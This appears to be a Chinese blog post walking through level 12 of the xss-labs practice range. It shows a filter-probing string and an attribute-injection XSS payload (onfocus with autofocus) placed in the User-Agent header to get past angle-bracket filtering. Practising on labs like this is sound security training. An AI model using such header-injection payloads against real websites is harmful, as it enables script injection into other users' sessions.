查看一下源码,发现这里是user_agent的值,那么就和上一关思路一样,抓包修改UA值
抓包修改先看一下过滤了什么,输入
" <Script><a Href=javascript:alert()> oNload Src Data;
只过滤掉了尖括号,我们可以利用事件绕过,payload同上一关,只是这次是在UA处修改
" onfocus=alert() autofocus type="text" "
**重点:**User-Agent头传值
xss-labs pass-12
Forfun_tt2025-10-24 15:10
相关推荐
云枫晖3 小时前
Webpack系列-编译过程AskHarries3 小时前
Toolhub — 一个干净实用的在线工具集合H尗4 小时前
Vue3响应式系统的精妙设计:深入理解 depsLength 与 trackId 的协同艺术昔人'4 小时前
html`contenteditable`爱宇阳4 小时前
npm 常用标签与使用技巧新手教程@大迁世界4 小时前
2025 年该选谁?npm vs yarn vs pnpmcrary,记忆4 小时前
简介NPM 和 NPXJianZhen✓4 小时前
现在在本地开发了一些代码A,又有了新需求要紧急开发代码B需要只上线代码B的代码,如何更好的处理这种情况郝学胜-神的一滴4 小时前
Cesium绘制线:从基础到高级技巧